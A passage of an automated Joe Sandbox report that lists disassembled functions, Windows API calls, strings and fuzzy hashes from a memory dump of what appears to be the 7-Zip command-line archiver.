                                                                                                                                                                                                • String ID: #
                                                                                                                                                                                                • API String ID: 1294909896-1885708031
                                                                                                                                                                                                • Opcode ID: b0f2d60c1820faef58548d21b8c4e06079b1368b0e0d09608c7fde7dbc05df21
                                                                                                                                                                                                • Instruction ID: 7cf555b7c7f98c6d8d455f81a45c1f46f9b58f20a22cf6216e98a744cef7345f
                                                                                                                                                                                                • Opcode Fuzzy Hash: b0f2d60c1820faef58548d21b8c4e06079b1368b0e0d09608c7fde7dbc05df21
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7231A123208A9482CB20DF15994055EA765FBD87E4FA44266FFAE4B768CE39C882C700
                                                                                                                                                                                                Function 00943CBC Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00943E32), ref: 00943D18
                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00943E32), ref: 00943D25
                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 00943D4E
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00943E32), ref: 00943DC1
                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 00943DFA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2296236218-0
                                                                                                                                                                                                • Opcode ID: a638d3b70a987569a11810fe08a21e1709710d38c6574b86da1fec5f089001b5
                                                                                                                                                                                                • Instruction ID: 23aaadb0a677fd477b3ad37cc1e476bacd9038d89b85956c447040b10765eddb
                                                                                                                                                                                                • Opcode Fuzzy Hash: a638d3b70a987569a11810fe08a21e1709710d38c6574b86da1fec5f089001b5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4531D073708BC59ADB30CF25E48475EBBA9F789B98F548121DA8963B24DB38C881C741
                                                                                                                                                                                                Function 00987080 Relevance: 7.6, APIs: 6, Instructions: 77COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
                                                                                                                                                                                                • Instruction ID: deaba0ea9fb8985d98db09f98bdfe7f8e7b280a97ee344cea64370b8d37765f2
                                                                                                                                                                                                • Opcode Fuzzy Hash: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D214F6770AA8485CB29EF75D450729A364FBC5FA8F694225DF2D17B98CF35C841C310
                                                                                                                                                                                                Function 00946778 Relevance: 7.6, APIs: 5, Instructions: 74filetimeCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$Create$CloseHandleTimefree
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 234454789-0
                                                                                                                                                                                                • Opcode ID: 2c2437ba34a7087855f8770e7a2108f964c72db211cbb1ecc9a6ff53a80baa42
                                                                                                                                                                                                • Instruction ID: 825a8a3112c5f241a5d6515ca1b07152622671ffbad027cae6308c2999d51196
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c2437ba34a7087855f8770e7a2108f964c72db211cbb1ecc9a6ff53a80baa42
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7221C67320468086D6209F16F954B5A6725F386BF8F544321EE75437D8CF39C98AD701
                                                                                                                                                                                                Function 0096BF88 Relevance: 7.6, APIs: 6, Instructions: 70COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1475443563-0
                                                                                                                                                                                                • Opcode ID: 1ace886e5cc3e700f187fce602ca08dcd48d7174a31f1a447d5d23bb38321506
                                                                                                                                                                                                • Instruction ID: 7cc99c30d5e6c410ddce69e33edea4744beb7e06d9c25715978e80ddb829d0b2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ace886e5cc3e700f187fce602ca08dcd48d7174a31f1a447d5d23bb38321506
                                                                                                                                                                                                • Instruction Fuzzy Hash: BE11AFE130974091EF04AF2A9D653B923259B49FC4FC48829EE0687306EF78CA46D345
                                                                                                                                                                                                Function 00968290 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0094B544: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,Path64,009682CA), ref: 0094B56F
                                                                                                                                                                                                  • Part of subcall function 0094B45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0094B4AA
                                                                                                                                                                                                  • Part of subcall function 0094B45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0094B4F8
                                                                                                                                                                                                • free.MSVCRT ref: 00968343
                                                                                                                                                                                                  • Part of subcall function 00943404: free.MSVCRT ref: 00943431
                                                                                                                                                                                                  • Part of subcall function 00943404: memmove.MSVCRT ref: 0094344C
                                                                                                                                                                                                  • Part of subcall function 00948624: free.MSVCRT ref: 009486A9
                                                                                                                                                                                                • free.MSVCRT ref: 0096832B
                                                                                                                                                                                                • free.MSVCRT ref: 00968336
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$QueryValue$Openmemmove
                                                                                                                                                                                                • String ID: 7z.dll$Software\7-zip
                                                                                                                                                                                                • API String ID: 2771487249-1558686312
                                                                                                                                                                                                • Opcode ID: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
                                                                                                                                                                                                • Instruction ID: cc5017dfef7c71fea5e5e9261847b998445dad41e22f86fb6b695a68f78b5eb4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
                                                                                                                                                                                                • Instruction Fuzzy Hash: E6118652348A8050CE20EB21E951BEE6764EBD5BE4F845211BE5D877A6DF28C64AC700
                                                                                                                                                                                                Function 0098225C Relevance: 7.6, APIs: 5, Instructions: 52COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3873070119-0
                                                                                                                                                                                                • Opcode ID: 195860d1492bba094a57b9ecf7c7289ce8bcd6229381cd4e357f1d334659de32
                                                                                                                                                                                                • Instruction ID: edf01ee8dc51e63ed5698e0bd8afaf09503adb557be3e63b71f583114f07da8d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 195860d1492bba094a57b9ecf7c7289ce8bcd6229381cd4e357f1d334659de32
                                                                                                                                                                                                • Instruction Fuzzy Hash: 92112E6231494592DB20EF26E85075E6330F7DABE8F409222EFAE43BA5DF28C945C700
                                                                                                                                                                                                Function 00946C84 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateDirectoryfree$ErrorLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3252411863-0
                                                                                                                                                                                                • Opcode ID: fc7c84208e05cc916470f72eeea78ecee52ed3ec44cc2f5207f8f15f03265912
                                                                                                                                                                                                • Instruction ID: 0b8d40feeb932e054abff4f61983f060dbaca808209d0772f134e1bb1c2407ee
                                                                                                                                                                                                • Opcode Fuzzy Hash: fc7c84208e05cc916470f72eeea78ecee52ed3ec44cc2f5207f8f15f03265912
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1601A76270874081DA30DB21ED94B7D5365ABCB7F4F588220EA6D837E5DF28C9868701
                                                                                                                                                                                                Function 0097056F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 4cc3be562f800f66c890074482ac147a4380dffb5d2304e0dd1a317519950c51
                                                                                                                                                                                                • Instruction ID: 18a087474148afe982e08374348a365b58d4d4f1cc7493ec164da5857fdef0ee
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4cc3be562f800f66c890074482ac147a4380dffb5d2304e0dd1a317519950c51
                                                                                                                                                                                                • Instruction Fuzzy Hash: 14F0DA6325A58482CA19FF36E461B2E5350BBCBF91F815862AF0E57711DE38C487C704
                                                                                                                                                                                                Function 0094EC90 Relevance: 7.5, APIs: 6, Instructions: 19COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 76439c2ae6d2279247935120ce8afe15d695928ca0b2e8dcd2c70b0a6abef4e1
                                                                                                                                                                                                • Instruction ID: d74b95b78bf3f8846390da47dc7d6a2b5ed121ded156570385579c68c8137398
                                                                                                                                                                                                • Opcode Fuzzy Hash: 76439c2ae6d2279247935120ce8afe15d695928ca0b2e8dcd2c70b0a6abef4e1
                                                                                                                                                                                                • Instruction Fuzzy Hash: 79E0F56261848481CB18FF76DCA292C23A4FFDDF887541451BF2E8B325CD24C8D28384
                                                                                                                                                                                                Function 009824B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • free.MSVCRT ref: 009825EC
                                                                                                                                                                                                • fputs.MSVCRT ref: 00982636
                                                                                                                                                                                                  • Part of subcall function 0098B1C8: memset.MSVCRT ref: 0098B20D
                                                                                                                                                                                                  • Part of subcall function 0098B1C8: fputs.MSVCRT ref: 0098B232
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$freememset
                                                                                                                                                                                                • String ID: Name$Size
                                                                                                                                                                                                • API String ID: 2276422817-481755742
                                                                                                                                                                                                • Opcode ID: eadf18be6b312c5b5e1de07ee489d0b3ab3b1ff87b37fbe43ef131a6c7ee7c31
                                                                                                                                                                                                • Instruction ID: d5b4a4801e6ec36957bc2595b15a7de03308b124d8cb5900b39e618f02641fb4
                                                                                                                                                                                                • Opcode Fuzzy Hash: eadf18be6b312c5b5e1de07ee489d0b3ab3b1ff87b37fbe43ef131a6c7ee7c31
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E41B372214684A2DB26EF34E454BDE2724F794B58F889122AB5E47355DF78CA46C300
                                                                                                                                                                                                Function 0098BD5C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 82COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • fputs.MSVCRT ref: 0098BDCD
                                                                                                                                                                                                • fputs.MSVCRT ref: 0098BE0B
                                                                                                                                                                                                  • Part of subcall function 0098B1C8: memset.MSVCRT ref: 0098B20D
                                                                                                                                                                                                  • Part of subcall function 0098B1C8: fputs.MSVCRT ref: 0098B232
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$memset
                                                                                                                                                                                                • String ID: : Removing files after including to archive$Removing
                                                                                                                                                                                                • API String ID: 3543874852-1218467041
                                                                                                                                                                                                • Opcode ID: f313436687fa66b8265a09a25303336257e01bcf81b9bc681d1f23b01fb39c8c
                                                                                                                                                                                                • Instruction ID: 4a920201fa5788f3d85b3fcd04b182fe1f66cc9fdb5129ddf0ffd11c20652971
                                                                                                                                                                                                • Opcode Fuzzy Hash: f313436687fa66b8265a09a25303336257e01bcf81b9bc681d1f23b01fb39c8c
                                                                                                                                                                                                • Instruction Fuzzy Hash: E131A462200A8196DF78EB35E4957EE6324E781788F489422DB9F463A6DF7CD4CAC300
                                                                                                                                                                                                Function 0098C47C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • fputs.MSVCRT ref: 0098C4FD
                                                                                                                                                                                                • fputs.MSVCRT ref: 0098C50D
                                                                                                                                                                                                • free.MSVCRT ref: 0098C553
                                                                                                                                                                                                  • Part of subcall function 0098B1C8: memset.MSVCRT ref: 0098B20D
                                                                                                                                                                                                  • Part of subcall function 0098B1C8: fputs.MSVCRT ref: 0098B232
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$freememset
                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                • API String ID: 2276422817-3653984579
                                                                                                                                                                                                • Opcode ID: 2d51f8118dbba9063f6913f1af84da5abfe4bad0c8c255e5030384decc0f2edb
                                                                                                                                                                                                • Instruction ID: dc258a4a376e6e153f461e6c4b4e7c478996413d7fbbdcbfc9b30927cc6c76b5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d51f8118dbba9063f6913f1af84da5abfe4bad0c8c255e5030384decc0f2edb
                                                                                                                                                                                                • Instruction Fuzzy Hash: F3115152340A4291DB28FB35D8657AD6320FBC5BE8F485231FB2E477A6DF38D4958350
                                                                                                                                                                                                Function 0098B864 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • fputs.MSVCRT ref: 0098B8EB
                                                                                                                                                                                                • free.MSVCRT ref: 0098B90A
                                                                                                                                                                                                  • Part of subcall function 0098B1C8: memset.MSVCRT ref: 0098B20D
                                                                                                                                                                                                  • Part of subcall function 0098B1C8: fputs.MSVCRT ref: 0098B232
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$freememset
                                                                                                                                                                                                • String ID: ERROR: $WARNING:
                                                                                                                                                                                                • API String ID: 2276422817-2114518728
                                                                                                                                                                                                • Opcode ID: 8e3bba8349f46928f641cc6bcc1daefcf3e0a2bdec40cb1967d92b4bec262380
                                                                                                                                                                                                • Instruction ID: 3b73a107a6c39f85fd9358b7b1fa84209ee81c78e3f9176db38bdfc2d4134e14
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e3bba8349f46928f641cc6bcc1daefcf3e0a2bdec40cb1967d92b4bec262380
                                                                                                                                                                                                • Instruction Fuzzy Hash: 00118612305A8141DA29EF22E855BAE6320B7C5BE8F8C4226FF6F07395DF2CC485C300
                                                                                                                                                                                                Function 009810C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CriticalSection$EnterLeavefputs
                                                                                                                                                                                                • String ID: ERROR:
                                                                                                                                                                                                • API String ID: 4171338575-977468659
                                                                                                                                                                                                • Opcode ID: be048cf6878443a2184a7b989802cb390b223653ec2da76719a795addb1c1f7a
                                                                                                                                                                                                • Instruction ID: 133ab4b0feca7a14a45c70478b66e524a375bca8e4d24f3b4723b8fd8a09ef4e
                                                                                                                                                                                                • Opcode Fuzzy Hash: be048cf6878443a2184a7b989802cb390b223653ec2da76719a795addb1c1f7a
                                                                                                                                                                                                • Instruction Fuzzy Hash: F211BF7234598085DB05EF25EC547A82365BB86FA8F588231EE6E4B7A9CF388485C310
                                                                                                                                                                                                Function 0098BB9C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • fputs.MSVCRT ref: 0098BC6C
                                                                                                                                                                                                • free.MSVCRT ref: 0098BC78
                                                                                                                                                                                                  • Part of subcall function 0098B1C8: memset.MSVCRT ref: 0098B20D
                                                                                                                                                                                                  • Part of subcall function 0098B1C8: fputs.MSVCRT ref: 0098B232
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$freememset
                                                                                                                                                                                                • String ID: Archive size: $Files read from disk
                                                                                                                                                                                                • API String ID: 2276422817-3736835528
